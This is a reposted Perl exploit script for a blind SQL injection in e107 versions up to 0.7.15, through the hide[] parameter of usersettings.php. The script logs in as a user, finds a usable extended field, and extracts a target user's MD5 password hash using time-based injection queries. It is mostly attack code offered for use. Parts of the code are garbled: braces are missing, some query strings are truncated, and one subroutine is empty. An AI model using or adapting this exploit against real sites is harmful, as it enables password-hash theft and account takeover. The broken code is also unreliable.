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e107 <= 0.7.15 (extended_user_fields) Blind SQL Injection Exploit
来源:staker[at]hotmail[dot]it 作者:staker 发布时间:2009-04-21  

#!/usr/bin/env perl
# e107 <= 0.7.15 "extended_user_fields" Blind SQL Injection Exploit
# Description
# -------------------------------------------------------------------
# e107 contains one flaw that allows an attacker to carry out an SQL
# injection attack. The issue is due to the "usersettings.php" script
# not properly saniting user-supplied input to the hide[] key.
# This may allow an attacker to inject or manipulate sql queries in
# the backend database if magic_quotes_gpc = off.
# -------------------------------------------------------------------
# Code Details (usersettings.php)
# -------------------------------------------------------------------
# Line 433 - 441
# if($ue_fields) {
#    $hidden_fields = implode("^", array_keys($_POST['hide'])); <------ {1}
#     if($hidden_fields != "")
#     {
#  $hidden_fields = "^".$hidden_fields."^"; 
#     }
#     $ue_fields .= ", user_hidden_fields = '".$hidden_fields."'"; <---- {2}
#   }
# Line 470 - 476

#  if($ue_fields)
#  {
#    [etc..]
#    $sql->db_Update("user_extended", $ue_fields." WHERE user_extended_id = '".intval($inp)."'");
#  } 

# ue[] POST variable needs a valid key
# such as "aim","msn" or other user_extended_fields
# (@fields array).
# Fix this sql injection using (php function)
# mysql_real_escape_string to the POST 'hide' key,
# otherwise find a way to fix it. dont care
# ------------------------------------------
# Discovered & Written
# by Juri Gianni aka yeat - staker[at]hotmail[dot]it

# Thanks to
# ---------------------------------------------
# JosS,girex,str0ke,certaindeath,plucky
# #zeroidentity chan - http://zeroidentity.org
# ---------------------------------------------
# http://www.youtube.com/watch?v=0rgInHvW8Ic
# http://www.youtube.com/watch?v=O2y62xcUJ8E
# ---------------------------------------------

use LWP::UserAgent;

my $prefix = "e107_"; # default table_prefix
my $type_i = undef;
my $sock_u = new LWP::UserAgent;

my ($domain,$user_name,$user_pwd,$target) = @ARGV;

e107::Usage() unless scalar (@ARGV) > 3;
$type_i = e107::ExtendedField();

sub e107::Usage
       print "e107 <= 0.7.15 'extended_user_fields' Blind SQL Injection Exploit\n";
       print "Usage: perl xpl.pl http://[host]/[path] [username] [password] [target id]\n";
       print "Usage: perl xpl.pl http://localhost/e107 yeat an4rchy 1\n";

sub e107::Exploit


sub e107::SqlQuery
       my ($do_query,$response,$start,$down,$element);
       $do_query = $_[0] || die $!;
       $start = time();
       $response = $sock_u->post($domain.'/usersettings.php',
                                 "email"           => 'doesnt@exists.net',
                                 "ue[user_$type_i]" => 1,
                                 "hide[$do_query]" => 1,
                                 "updatesettings"  => 'Save Settings',
                              ]) or die $!;
       $down = time();
       return $down - $start;                           


sub e107::CheckField
       my ($do_query,$response,$start,$down,$element);
       $do_query = $_[0];
       $element  = $_[1] || die $!; 
       $start = time();
       $response = $sock_u->post($domain.'/usersettings.php',
                                 "email"           => 'doesnt@exists.net',
                                 "ue[user_$element]" => 1,
                                 "hide[$do_query]" => 1,
                                 "updatesettings"  => 'Save Settings',
                              ]) or die $!;
       $down = time();
       return $down - $start;                           

sub e107::ExtendedField
       my @fields = ('yeat','aim','birthday','icq','language','location','msn','yahoo','homepage');
       my $query = "\x27/**/OR/**/CASE/**/WHEN(1>0)/**/THEN".
       for (my $i=1;$i<8;$i++) {
             if (e107::CheckField($query,$fields[$i]) > 6) {
                return $fields[$i]; last;
             unless ($i != 8 && $fields[$i]) {
               die("Site not vulnerable..\n");

sub e107::SqlBrute
       my $ascii = $_[0];
       my $limit = $_[1] || 1;
       my $sql_query = "\x27/**/OR/**/(SELECT/**/IF((ASCII(SUBSTRING(user_password,$limit,1))".
       return $sql_query;               


sub e107::BruteForce
       my $i = 1;
       my @charset = (97..102,48..57);
       my $convert = undef;
       my $result  = undef;
       for ($i..32) {
             foreach $convert (@charset) {
                   if (e107::SqlQuery(e107::SqlBrute($convert,$i)) > 9) {
                      syswrite(STDOUT,chr($convert)); $i++;
                      last; $result .= chr($convert);
       unless (length($result) != 32) {
          print "\nHash MD5: $result\n";
          print "User ID: $target\n";


sub e107::Vulnerable
       my @fields = ('yeat','aim','birthday','icq','language','location','msn','yahoo','homepage');
       for (my $i=1;$i<8;$i++) {
            if ($fields[$i] eq $type_i) {
               print "Exploiting..\n"; last;
            else {
               die ("Site not vulnerable..\n");

sub e107::Login
        my ($username,$password) = @_;
        my ($result,$response);
        $response =  $sock_u->post($domain.'/signup.php',
                                   username  => $username,
                                   userpass  => $password,
                                   userlogin => 'Login',
                                   autologin => 0
                                 ]) or die $!;
        $result = $response->as_string;                        
        if ($result =~ /e107cookie=(\d+)\.([0-9a-f]{32})/i) {
             $sock_u->default_header('Cookie' => "e107cookie=$1.$2;");
             $sock_u->agent('Lynx (textmode) - Logged');
        else {
           die("Login failed..\n");

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